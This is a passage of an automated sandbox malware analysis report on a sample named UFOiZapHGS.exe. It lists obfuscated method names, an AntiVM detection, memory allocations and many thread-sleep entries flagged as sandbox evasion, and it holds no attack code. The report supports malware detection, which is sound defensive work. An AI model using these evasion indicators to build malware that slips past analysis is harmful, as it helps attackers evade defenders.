                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, rYESTdeEVhin7mQVke.csHigh entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, YsRmyuNdGdZhXTNigh.csHigh entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, V8xnZkzbloQN1oqh1t.csHigh entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, NfMc5VP5elSuT97t75.csHigh entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.csHigh entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, Tb71NqASyY2jsVR0Wv5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 97B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: A9B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: C000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: D000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598865Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597874Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597546Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597098Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596983Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596872Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596757Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596643Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596516Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596405Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595969Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595750Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeWindow / User API: threadDelayed 1869Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeWindow / User API: threadDelayed 7983Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7016Thread sleep count: 1869 > 30Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7016Thread sleep count: 7983 > 30Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598865s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -597098s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596983s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596872s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596757s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596643s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596405s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -596078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -595063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -594938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -594718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024Thread sleep time: -594500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598865Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597874Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597546Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 597098Jump to behavior
